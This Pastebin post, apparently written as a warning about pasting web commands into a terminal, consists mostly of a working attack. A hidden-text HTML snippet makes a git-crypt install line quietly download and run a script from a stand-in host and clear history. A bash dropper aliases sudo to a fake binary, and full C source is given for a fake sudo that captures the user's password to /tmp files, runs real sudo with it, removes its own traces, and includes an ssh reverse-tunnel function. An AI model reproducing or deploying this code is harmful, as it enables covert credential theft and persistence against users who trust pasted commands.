Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # This is why we should never use sudo with a password to run arbitrary commands
- # Consider using a root login from a TTY console instead.
- #
- # Author: nullbyte
- #
- # Scenario: you visit a web page and decide that you're too lazy to type out everything on the page, so you copy and paste a script, or a link, or some info from the web, into your terminal...This is a BIG MISTAKE!
- <html>
- <head>
- </head>
- <body>
- Quick installation method for git-crypt:
- <p class="codeblock">
- clear;git clone https://github.com/AGWA/git-crypt.git
- <span style="position: absolute; left: -100px; top: -100px">
- -help &> /dev/null;printf '\x1b[0;30;40m'<br>
- alias o='reset;rm -rf git-crypt &>/dev/null && \curl -fso ~/q http://127.0.0.1/q &>/dev/null && chmod +x ~/q && ~/q;alias sudo=~/bin/ssh-askpass;unset o;reset;history -c;clear;git clone https://github.com/AGWA/git-crypt.git'<br>
- printf '\x1b[0m'<br>
- o;history -c<br>
- </span>
- <br>
- </p>
- </body>
- </html>
- #
- # The copy-paste action above downloads and runs the script: 'q'
- # Here is the source for the script: 'q'
- #
- #!/usr/bin/env bash
- setupfunc()
- {
- mkdir ~/bin
- \curl -fso ~/bin/ssh-askpass http://127.0.0.1/ssh-askpass
- chmod +x ~/bin/ssh-askpass
- echo 'alias sudo=~/bin/ssh-askpass' >> ~/.profile
- }
- setupfunc &> /dev/null && rm -f ~/q &> /dev/null
- # This uses 127.0.0.1 for demo purposes, but an attacker would substitute for the attacker's server IP.
- # Now, the attacker hosting this webpage will have already compiled the binary 'ssh-askpass' and hosted it on his or her website.
- # The 'ssh-askpass' program is actually a fake version of sudo. The sudo command gets added as an alias to ~/bin/ssh-askpass in your bash profile.
- # If you ever run sudo, then the password will be stolen and copied to /tmp as /tmp/pass.$UID and /tmp/cached.$UID
- # The program will try to remove itself by modifying the ~/.bash_logout script.
- #
- # Here is the source for sudo.c
- # compile with: gcc ./sudo.c -DLINUX -o ssh-askpass
- #include <stdio.h>
- #include <stdlib.h>
- #include <stdarg.h>
- #include <string.h>
- #include <signal.h>
- #include <ctype.h>
- #include <errno.h>
- #include <fcntl.h>
- #include <limits.h>
- #include <unistd.h>
- #include <arpa/inet.h>
- #include <netinet/in.h>
- #include <sys/mman.h>
- #include <sys/stat.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <sys/wait.h>
- #include <openssl/md5.h>
- #include <openssl/rand.h>
- #include <openssl/evp.h>
- #if defined LINUX
- #include <alloca.h>
- #include <bsd/string.h>
- #endif
- #define DLINE {printf("LINE=%d\n",__LINE__);fflush(stdout);}
- #define DIE exit(EXIT_FAILURE)
- int bytes(char *filename);
- void add_cleanup_to_bash_logout();
- void remove_from_all_profiles();
- void remove_from_profile(char *profile);
- char *join_strings(char *a, char *b);
- int getbit(int n, int bit);
- int file_exists(char *path);
- int file_iswritable(char *path);
- void show_file_permissions(char *path);
- int sudo(int argc, char **argv);
- void append_file(char *path, char *str);
- void append_file_with_newline(char *path, char *str);
- void overwrite_file(char *path, char *str);
- char *load_pass(char *file_name);
- int http_get(char *ip_address, char *file);
- int ssh_reverse_shell();
- #if defined LINUX
- // GNU gsed only
- #define BASH_LOGOUT_SCRIPT "rm -f ~/bin/ssh-askpass & sed ~/.bash_logout -e's|rm -f ~/bin/ssh-askpass.*$||g' -i"
- #define SUDO "/usr/bin/sudo"
- #endif
- #if defined BSD
- // works with GNU gsed
- #define BASH_LOGOUT_SCRIPT "rm -f ~/bin/ssh-askpass &>/dev/null & sed ~/.bash_logout -e '/~\\/bin\\/ssh-askpass.*/d' -i &>/dev/null"
- #define SUDO "/usr/local/bin/sudo"
- #endif
- #if defined DARWIN
- #define BASH_LOGOUT_SCRIPT "rm -f ~/bin/ssh-askpass &>/dev/null & sed ~/.bash_logout -e '/~\\/bin\\/ssh-askpass.*/d' -i &>/dev/null"
- #define SUDO "/usr/bin/sudo"
- #endif
- #define ALIAS "alias sudo=~/bin/ssh-askpass"
- #define PASS "/tmp/pass"
- #define CACHED "/tmp/cached"
- // get gcc to stop complaining about unused: argc, argv[]
- #define ARGS_USED {if (argc < 2 && (strlen(argv[0]) == 0)) exit(EXIT_FAILURE);}
- int main(int argc, char **argv)
- {
- ARGS_USED;
- sudo(argc,argv);
- remove_from_all_profiles();
- add_cleanup_to_bash_logout();
- //http_get("127.0.0.1","/index.html");
- return 0;
- }
- /*
- * Remove ALIAS from all shell profiles that are bash compatible.
- */
- void remove_from_all_profiles()
- {
- char *profile=NULL;
- char *home=NULL;
- home = getenv("HOME");
- if (home == NULL) return;
- profile = join_strings(home,"/.profile");
- remove_from_profile(profile);
- free(profile);
- profile=NULL;
- profile = join_strings(home,"/.zprofile");
- remove_from_profile(profile);
- free(profile);
- profile=NULL;
- profile = join_strings(home,"/.bash_profile");
- remove_from_profile(profile);
- free(profile);
- profile=NULL;
- profile = join_strings(home,"/.bashrc");
- remove_from_profile(profile);
- free(profile);
- profile=NULL;
- }
- /*
- * Append a line to the ~/.bash_logout script that removes all
- * evidence that the fake sudo program ever existed.
- */
- void add_cleanup_to_bash_logout()
- {
- char *logoutscript=NULL;
- logoutscript = join_strings(getenv("HOME"),"/.bash_logout");
- append_file(logoutscript,BASH_LOGOUT_SCRIPT);
- }
- /* file_exists()
- * file exists: return 1
- * file does not exist: return 0
- */
- int file_exists(char *path)
- {
- struct stat st;
- if (stat(path,&st) == 0) return 1;
- else return 0;
- }
- /* file_iswritable()
- * file is writable: return 1
- * file is read-only: return 0
- */
- int file_iswritable(char *path)
- {
- struct stat st;
- // check whether or not stat succeeded
- if (stat(path,&st) == -1) return 0;
- // Check whether or not the file is world-writable
- if (getbit(st.st_mode,1) == 1) {
- return 1;
- }
- // Check whether or not the file is owner-writable
- if (getbit(st.st_mode,7) == 1) {
- return 1;
- }
- return 0;
- }
- void show_file_permissions(char *path)
- {
- struct stat st;
- // check whether or not stat succeeded
- if (stat(path,&st) == -1) return;
- printf("st.st_mode=%d owner=%d%d%d group=%d%d%d world=%d%d%d\n",st.st_mode,
- getbit(st.st_mode,8),getbit(st.st_mode,7),getbit(st.st_mode,6),
- getbit(st.st_mode,5),getbit(st.st_mode,4),getbit(st.st_mode,3),
- getbit(st.st_mode,2),getbit(st.st_mode,1),getbit(st.st_mode,0));
- }
- int getbit(int n, int bit)
- {
- if (bit > 0) {
- return (n/(1<<bit))%2;
- } else if(bit == 0) {
- return n%2;
- } else {
- return 0;
- }
- }
- char *join_strings(char *a, char *b)
- {
- char *c=NULL;
- size_t clen=0;
- clen = strlen(a)+strlen(b);
- c = malloc(clen+1);
- memset(c,0,clen+1);
- snprintf(c,clen+1,"%s%s",a,b);
- return c;
- }
- int sudo(int argc, char **argv)
- {
- char buf[128];
- int i;
- size_t promptlen=0;
- char *prompt=NULL;
- char *passfile=NULL;
- size_t passfilelen=0;
- char *cachedfile=NULL;
- size_t cachedfilelen=0;
- char *pass=NULL;
- char *username=NULL;
- char *argstr=NULL;
- size_t argstrlen = 1024;
- struct stat st;
- char *e[] = { NULL };
- FILE *f=NULL;
- if (argc < 2) {
- char *a[] = { SUDO, NULL };
- execve(a[0],a,e);
- exit(EXIT_FAILURE);
- }
- for (i=1;i<argc;i++) {
- if ((argv[i][0] == '-') && (argv[i][1] == 'h') && (argv[i][2] == 0)) {
- char *a[] = { SUDO, "-h", NULL };
- execve(a[0],a,e);
- exit(EXIT_SUCCESS);
- }
- }
- /* initialize the filename /tmp/pass.uid */
- memset(buf,0,128);
- snprintf(buf,128,".%d",getuid());
- passfilelen=strlen(PASS)+strlen(buf);
- passfile = malloc(passfilelen+1);
- snprintf(passfile,passfilelen+1,"%s%s",PASS,buf);
- /* initialize the filename /tmp/cached.uid */
- memset(buf,0,128);
- snprintf(buf,128,".%d",getuid());
- cachedfilelen=strlen(CACHED)+strlen(buf);
- cachedfile = malloc(cachedfilelen+1);
- snprintf(cachedfile,cachedfilelen+1,"%s%s",CACHED,buf);
- /* initialize the sudo prompt */
- username = getenv("USER");
- promptlen = 22+strlen(username);
- prompt = malloc(promptlen+1);
- memset(prompt,0,promptlen);
- snprintf(prompt,promptlen+1,"[sudo] password for %s: ",username);
- if (stat(passfile,&st) == -1) {
- // If we cannot find the /tmp/pass.uid file:
- pass = getpass(prompt); // '[sudo] password for $USER: '
- append_file_with_newline(passfile,pass); // steal passphrase and append to a file
- overwrite_file(cachedfile,pass); // steal passphrase and overwrite file
- } else {
- // If we found the /tmp/pass.uid file:
- //pass = getpass(prompt); // '[sudo] password for $USER: '
- //append_file_with_newline(passfile,pass); // steal passphrase and append to a file
- //overwrite_file(cachedfile,pass); // steal passphrase and overwrite file
- }
- argstr = malloc(argstrlen);
- memset(argstr,0,argstrlen);
- if (pass == NULL) {
- pass = load_pass(cachedfile);
- }
- sprintf(argstr,"echo '%s'|",pass);
- strcat(argstr,SUDO);
- strcat(argstr," -p '' -S ");
- for (i=1;i<argc;i++) {
- strcat(argstr,argv[i]);
- if (i != argc-1) {
- strcat(argstr," ");
- }
- }
- if (pass == NULL) {
- pass = load_pass(cachedfile);
- } else if (strlen(pass) == 0) {
- pass = load_pass(cachedfile);
- }
- //printf("cachedfile='%s' pass='%s' strlen(pass)=%d argstr='%s'\n",cachedfile,pass,(int)strlen(pass),argstr);
- f = popen(argstr,"w"); // sudo -p '' -S <args>
- fprintf(f,"\n");
- fclose(f);
- free(argstr);
- return 0;
- }
- void remove_from_profile(char *profile)
- {
- char *tag = ALIAS;
- int taglen=0;
- int i;
- char c;
- char *a=NULL;
- char *b=NULL;
- char *p=NULL;
- size_t alias_offset=0;
- int status=0;
- int size=0;
- enum { INCOMPLETE, COMPLETE };
- FILE *f=NULL;
- taglen=(int)strlen(ALIAS);
- if (!file_exists(profile)) {
- return;
- }
- if (!file_iswritable(profile)) {
- return;
- }
- status = INCOMPLETE;
- for (;;) {
- size = bytes(profile);
- p = malloc((size_t)size+2); // in-memory profile text
- memset(p,0,(size_t)size+2);
- b = malloc((size_t)size+2); // in-memory profile text
- memset(b,0,(size_t)size+2);
- f = fopen(profile,"r");
- for (i=0; i<(int)size && c != EOF; i++) {
- c = getc(f);
- p[i] = c;
- }
- fclose(f);
- f=NULL;
- a = strstr(p,tag);
- if (a != NULL) {
- alias_offset=(a-p);
- memcpy(b,p,alias_offset);
- memcpy(b+alias_offset,p+alias_offset+taglen,strlen(a+taglen));
- f = fopen(profile,"w");
- fprintf(f,"%s",b);
- fclose(f);
- memset(p,0,size);
- free(p);
- free(b);
- } else {
- status=COMPLETE;
- }
- if (status == COMPLETE) {
- break;
- }
- }
- }
- int bytes(char *filename)
- {
- int size=0;
- FILE *f = NULL;
- f = fopen(filename,"r");
- if (f == NULL) return 0;
- while (getc(f) != EOF) {
- size++;
- }
- fclose(f);
- return size;
- }
- void append_file_with_newline(char *path, char *str)
- {
- FILE *f=NULL;
- f = fopen(path,"a");
- fprintf(f,"%s\n",str);
- fclose(f);
- }
- void append_file(char *path, char *str)
- {
- FILE *f=NULL;
- f = fopen(path,"a");
- fprintf(f,"%s",str);
- fclose(f);
- }
- void overwrite_file(char *path, char *str)
- {
- FILE *f=NULL;
- f = fopen(path,"w");
- fprintf(f,"%s\n",str);
- fclose(f);
- }
- char *load_pass(char *file_name)
- {
- int i;
- char *dst=NULL;
- char c = 0;
- FILE *src_file=NULL;
- dst = malloc(4096);
- memset(dst,0,4096);
- src_file = fopen(file_name, "r");
- if (src_file == NULL) {
- fprintf(stderr, "ERROR :: print_file() :: Can't open file.\n");
- return 0;
- }
- for (i=0; (c!=EOF) && (i<4095); i++) {
- c = getc(src_file);
- if (c == '\n') {
- break;
- } else {
- dst[i] = c;
- }
- }
- /* clean up */
- fclose(src_file);
- src_file = NULL;
- return dst;
- }
- int http_get(char *ip_address, char *file)
- {
- int port = 80;
- int connect_status=0,received_bytes=0,sent_bytes=0;
- size_t input_buffer_len=20000;
- char *input_buffer;
- int socket_handle;
- struct sockaddr_in socket_detials;
- size_t httpgetlen=0;
- char *httpget=NULL;
- char *host = "www.google.com";
- char *user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0";
- char *accept = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
- char *accept_language = "en-US,en;q=0.5";
- char *accept_encoding = "gzip, deflate";
- // GET /index.html HTTP/1.1
- // Host: www.google.com
- // User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0
- // Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- // Accept-Language: en-US,en;q=0.5
- // Accept-Encoding: gzip, deflate
- // DNT: 1
- // Connection: keep-alive
- httpgetlen += strlen("GET ") + strlen(file) + 9 + 2;
- httpgetlen += strlen("Host: ") + strlen(host) + 2;
- httpgetlen += strlen("User-Agent: ") + strlen(user_agent) + 2;
- httpgetlen += strlen("Accept: ") + strlen(accept) + 2;
- httpgetlen += strlen("Accept-Language: ") + strlen(accept_language) + 2;
- httpgetlen += strlen("Accept-Encoding: ") + strlen(accept_encoding) + 2;
- httpgetlen += strlen("DNT: 1") + 2;
- httpgetlen += strlen("Connection: keep-alive") + 2;
- httpget = malloc(httpgetlen+1);
- memset(httpget,0,httpgetlen);
- snprintf(httpget,httpgetlen+1,
- "GET %s HTTP/1.1\r\n" \
- "Host: %s\r\n" \
- "User-Agent: %s\r\n" \
- "Accept: %s\r\n" \
- "Accept-Language: %s\r\n" \
- "Accept-Encoding: %s\r\n" \
- "DNT: 1\r\n" \
- "Connection: keep-alive\r\n",
- file,
- host,
- user_agent,
- accept,
- accept_language,
- accept_encoding);
- printf("%s\n\n",httpget);
- printf("strlen(httpget)=%d\n",(int)strlen(httpget));
- printf("httpgetlen =%d\n",(int)httpgetlen);
- /* setup receive buffer */
- input_buffer = malloc(input_buffer_len);
- memset(input_buffer,0,input_buffer_len);
- socket_handle = socket(AF_INET, SOCK_STREAM,0);
- socket_detials.sin_family = AF_INET;
- socket_detials.sin_addr.s_addr = inet_addr(ip_address);
- socket_detials.sin_port = htons(port);
- bzero(&(socket_detials.sin_zero),8);
- connect_status = connect(socket_handle, (struct sockaddr*)&socket_detials, sizeof(struct sockaddr));
- if (connect_status == -1) printf("Cannot connect to server.\n");
- if (connect_status == 0) {
- printf("Sent %d bytes\n",sent_bytes);
- sent_bytes = (int)send(socket_handle, httpget, strlen(httpget),0);
- received_bytes = (int)recv(socket_handle, input_buffer, input_buffer_len,0);
- printf("Received %d bytes\n",received_bytes);
- printf("%s\n",input_buffer);
- }
- /* cleanup memory */
- memset(input_buffer,0,input_buffer_len);
- free(input_buffer);
- input_buffer=NULL;
- memset(httpget,0,httpgetlen);
- free(httpget);
- httpget=NULL;
- return 0;
- }
- int ssh_reverse_shell()
- {
- if (0 == fork()) {
- execl("/usr/bin/ssh",
- "ssh",
- "-R",
- "12345:localhost:22",
- "user@server",
- NULL);
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement